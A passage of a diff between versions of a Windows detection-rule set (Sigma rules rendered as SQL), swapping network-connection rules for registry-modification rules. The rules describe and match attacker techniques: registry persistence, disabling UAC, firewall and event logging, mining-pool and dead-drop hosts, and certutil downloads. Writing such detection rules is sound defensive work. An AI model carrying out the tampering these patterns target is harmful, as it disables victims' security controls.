An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert javascript for persistence", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.007" + "attack.t1112" ], "falsepositives": [ - "Legitimate msiexec over networks" + "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings%' ESCAPE '\\') AND NOT ((NewValue LIKE 'DWORD%' ESCAPE '\\') OR (NewValue IN ('Cookie:', 'Visited:', '(Empty)')) OR ((TargetObject LIKE '%\\\\Cache%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ZoneMap%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WpadDecision%' ESCAPE '\\')) OR (NewValue = 'Binary Data') OR (TargetObject LIKE '%\\\\Accepted Documents\\\\%' ESCAPE '\\')))" ], - "filename": "net_connection_win_msiexec.yml" + "filename": "registry_set_persistence_ie.yml" }, { - "title": "Suspicious Dropbox API Usage", - "id": "25eabf56-22f0-4915-a1ed-056b8dae0a68", + "title": "Potential Persistence Via App Paths Default Property", + "id": "707e097c-e20f-4f67-8807-1f72ff4500d6", "status": "experimental", - "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. 
Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1546.012" + ], "falsepositives": [ - "Legitimate use of the API with a tool that the author wasn't aware of" + "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND (DestinationHostname LIKE '%api.dropboxapi.com' ESCAPE '\\' OR DestinationHostname LIKE '%content.dropboxapi.com' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\Dropbox%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\App Paths%' ESCAPE '\\' AND (TargetObject LIKE '%(Default)' ESCAPE '\\' OR TargetObject LIKE '%Path' ESCAPE '\\') AND (NewValue LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%%' ESCAPE '\\' OR NewValue LIKE '%iex%' ESCAPE '\\' OR NewValue LIKE '%Invoke-%' ESCAPE '\\' OR NewValue LIKE '%rundll32%' ESCAPE '\\' OR NewValue LIKE '%regsvr32%' ESCAPE '\\' OR NewValue LIKE '%mshta%' ESCAPE '\\' OR NewValue LIKE '%cscript%' ESCAPE '\\' OR NewValue LIKE '%wscript%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE 
'%.hta%' ESCAPE '\\' OR NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.ps1%' ESCAPE '\\'))" ], - "filename": "net_connection_win_susp_dropbox_api.yml" + "filename": "registry_set_persistence_app_paths.yml" }, { - "title": "RDP to HTTP or HTTPS Target Ports", - "id": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", + "title": "Potential AutoLogger Sessions Tampering", + "id": "f37b4bce-49d0-4087-9f5b-58bffda77316", "status": "experimental", - "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389' AND DestinationPort IN ('80', '443'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\WMI\\\\Autologger\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\EventLog-%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Defender%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Enable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Start' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\')))" ], - "filename": "net_connection_win_rdp_to_http.yml" + "filename": "registry_set_disable_autologger_sessions.yml" }, { - "title": "Microsoft Binary Github Communication", - "id": "635dbb88-67b3-4b41-9ea5-a3af2dd88153", + 
"title": "Registry Persistence via Explorer Run Key", + "id": "b7916c2a-fa2f-4795-9477-32b731f70f11", "status": "test", - "description": "Detects an executable in the Windows folder accessing github.com", - "author": "Michael Haag (idea), Florian Roth (Nextron Systems)", + "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1105", - "attack.exfiltration", - "attack.t1567.001" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown", - "@subTee in your network" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND (DestinationHostname LIKE '%.github.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run' ESCAPE '\\') AND ((NewValue LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\ProgramData\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Users\\\\Default\\\\%' ESCAPE '\\') OR NewValue LIKE '%\\\\AppData\\\\%' ESCAPE '\\'))" ], - "filename": "net_connection_win_binary_github_com.yml" + "filename": "registry_set_susp_reg_persist_explorer_run.yml" }, { - "title": "Microsoft Sync Center Suspicious Network Connections", - "id": "9f2cc74d-78af-4eb2-bb64-9cd1d292b87b", + "title": "Disable UAC Using Registry", + "id": "48437c39-9e5f-47fb-af95-3d663c3f2919", "status": "experimental", - "description": 
"Detects suspicious connections from Microsoft Sync Center to non-private IPs.", - "author": "elhoim", + "description": "Detects when an attacker tries to disable User Account Control (UAC) by changing its registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA from 1 to 0", + "author": "frack113", "tags": [ - "attack.t1055", - "attack.t1218", - "attack.execution", - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\mobsync.exe' ESCAPE '\\' AND NOT ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\') AND DestinationIsIpv6 = 'false'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLUA%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_susp_outbound_mobsync_connection.yml" + "filename": "registry_set_disable_uac_registry.yml" }, { - "title": "Python 
Initiated Connection", - "id": "bef0bc5a-b9ae-425d-85c6-7b2d705980c6", + "title": "Office Security Settings Changed", + "id": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", "status": "experimental", - "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", - "author": "frack113", + "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.discovery", - "attack.t1046" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate python script" + "Valid Macros and/or internal documents" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND NewProcessName LIKE '%python%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\conda.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\conda-script.py%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\python.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\jupyter-notebook-script.py%' ESCAPE '\\') OR (DestinationIp = '127.0.0.1' AND SourceIp = '127.0.0.1')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Security\\\\Trusted Documents\\\\TrustRecords' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\AccessVBOM' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\VBAWarnings' ESCAPE '\\'))" ], - "filename": "net_connection_win_python.yml" + "filename": "registry_set_office_security.yml" }, { - "title": "Silenttrinity Stager Msbuild Activity", - "id": 
"50e54b8d-ad73-43f8-96a1-5191685b17a4", + "title": "Disable Microsoft Defender Firewall via Registry", + "id": "974515da-6cc5-4c95-ae65-f97f9150ec7f", "status": "test", - "description": "Detects a possible remote connections to Silenttrinity c2", - "author": "Kiran kumar s, oscd.community", + "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1127.001" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' AND DestinationPort IN ('80', '443') AND Initiated = 'true')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\SharedAccess\\\\Parameters\\\\FirewallPolicy\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\EnableFirewall' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml" + "filename": "registry_set_disable_defender_firewall.yml" }, { - "title": "Windows Crypto Mining Pool Connections", - "id": "fa5b1358-b040-4403-9868-15f7d9ab6329", - "status": "stable", - "description": "Detects process connections to a Monero crypto mining pool", - "author": "Florian Roth (Nextron Systems)", + "title": "Registry Explorer Policy Modification", + "id": "1c3121ed-041b-4d97-a075-07f54f20fb4a", + "status": "test", + "description": "Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)", + "author": "frack113", "tags": [ - "attack.impact", - "attack.t1496" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate use of crypto 
miners" + "Legitimate admin script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE DestinationHostname IN ('pool.minexmr.com', 'fr.minexmr.com', 'de.minexmr.com', 'sg.minexmr.com', 'ca.minexmr.com', 'us-west.minexmr.com', 'pool.supportxmr.com', 'mine.c3pool.com', 'xmr-eu1.nanopool.org', 'xmr-eu2.nanopool.org', 'xmr-us-east1.nanopool.org', 'xmr-us-west1.nanopool.org', 'xmr-asia1.nanopool.org', 'xmr-jp1.nanopool.org', 'xmr-au1.nanopool.org', 'xmr.2miners.com', 'xmr.hashcity.org', 'xmr.f2pool.com', 'xmrpool.eu', 'pool.hashvault.pro', 'moneroocean.stream', 'monerocean.stream')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoLogOff' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoDesktop' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoRun' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFind' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoControlPanel' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFileMenu' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoClose' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoSetTaskbar' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoPropertiesMyDocuments' ESCAPE '\\' OR TargetObject LIKE 
'%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoTrayContextMenu' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "net_connection_win_crypto_mining.yml" + "filename": "registry_set_set_nopolicies_user.yml" }, { - "title": "Rundll32 Internet Connection", - "id": "cdc8da7d-c303-42f8-b08c-b4ab47230263", - "status": "test", - "description": "Detects a rundll32 that communicates with public IP addresses", - "author": "Florian Roth (Nextron Systems)", + "title": "Set TimeProviders DllName", + "id": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", + "status": "experimental", + "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.011", - "attack.execution" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.003" ], "falsepositives": [ - "Communication to other corporate systems that use IP addresses from public address spaces" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Initiated = 'true') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' 
ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\') OR CommandLine LIKE '%PcaSvc.dll,PcaPatchSdbTask%' ESCAPE '\\' OR SourceHostname LIKE '%.internal.cloudapp.net' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND DestinationPort = '443')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders%' ESCAPE '\\' AND TargetObject LIKE '%DllName' ESCAPE '\\') AND NOT (NewValue LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\w32time.DLL' ESCAPE '\\'))" ], - "filename": "net_connection_win_rundll32_net_connections.yml" + "filename": "registry_set_timeproviders_dllname.yml" }, { - "title": "Suspicious Epmap Connection", - "id": "628d7a0b-7b84-4466-8552-e6138bc03b43", + "title": "Office Autorun Keys Modification", + "id": "baecf8fb-edbf-429f-9ade-31fc3f22b970", "status": "experimental", - "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", - "author": "frack113, Tim Shelton (fps)", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.lateral_movement" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Legitimate software automatically (mostly, 
during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((Protocol = 'tcp' AND Initiated = 'true' AND DestinationPort = '135') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Amazon\\\\SSM\\\\Update\\\\amazon-ssm-agent-updater%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Office%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Word\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PowerPoint\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Onenote\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Access\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%test\\\\Special\\\\Perf%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\regsvr32.exe%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Excel\\\\Addins\\\\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\ExcelPlugInShell.PowerMapConnect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\NativeShim\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\NativeShim.InquireConnector.1\\\\%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\Excel\\\\Addins\\\\PowerPivotExcelClientAddIn.NativeEntry.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\AccessAddin.DC\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\ColleagueImport.ColleagueImportAddin\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\EvernoteCC.EvernoteContactConnector\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\EvernoteOLRD.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\Microsoft.VbaAddinForOutlook.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OcOffice.OcForms\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OneNote.OutlookAddin%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OscAddin.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OutlookChangeNotifier.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UCAddin.LyncAddin.1%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UCAddin.UCAddin.1%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UmOutlookAddin.FormRegionAddin\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\RegSvr.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\Antivirus.AsOutExt\\\\%' ESCAPE '\\')))" ], - "filename": "net_connection_win_susp_epmap.yml" + "filename": "registry_set_asep_reg_keys_modification_office.yml" }, { - "title": "Dead Drop Resolvers", - "id": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", - "status": "test", - "description": "Detects an executable, which is not an internet browser, making DNS request to legit 
popular websites, which were seen to be used as dead drop resolvers in previous attacks.", - "author": "Sorina Ionescu", + "title": "NET NGenAssemblyUsageLog Registry Key Tamper", + "id": "28036918-04d3-423d-91c0-55ecf99fb892", + "status": "experimental", + "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1102", - "attack.t1102.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND (DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%youtube.com' ESCAPE '\\' OR DestinationHostname LIKE '%technet.microsoft.com' ESCAPE '\\' OR DestinationHostname LIKE '%facebook.com' ESCAPE '\\' OR DestinationHostname LIKE '%.cloudflare.com' ESCAPE '\\' OR DestinationHostname LIKE '%docs.google.com' ESCAPE '\\' OR DestinationHostname LIKE '%steamcommunity.com' ESCAPE '\\' OR DestinationHostname LIKE '%reddit.com' ESCAPE '\\' OR DestinationHostname LIKE '%fotolog.com' ESCAPE '\\' OR DestinationHostname LIKE '%twitter.com' ESCAPE '\\' OR DestinationHostname LIKE '%imgur.com' ESCAPE '\\' OR DestinationHostname LIKE '%feeds.rapidfeeds.com' ESCAPE '\\' OR DestinationHostname LIKE '%livejournal.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\edge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MsSense.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PRTG Probe.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Engine.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry 
value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\NGenAssemblyUsageLog' ESCAPE '\\')" ], - "filename": "net_connection_win_dead_drop_resolvers.yml" + "filename": "registry_set_net_cli_ngenassemblyusagelog.yml" }, { - "title": "Certutil Initiated Connection", - "id": "0dba975d-a193-4ed1-a067-424df57570d1", - "status": "experimental", - "description": "Detects a network connection intitiated by the certutil.exe tool. Attackers can abuse `certutil.exe` to download malware or offensive security tools.", - "author": "frack113, Florian Roth", + "title": "Enabling COR Profiler Environment Variables", + "id": "ad89044a-8f49-4673-9a55-cbd88a1b374f", + "status": "test", + "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "falsepositives": [ - "Legitimate certutil network connection" + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.012" ], "level": 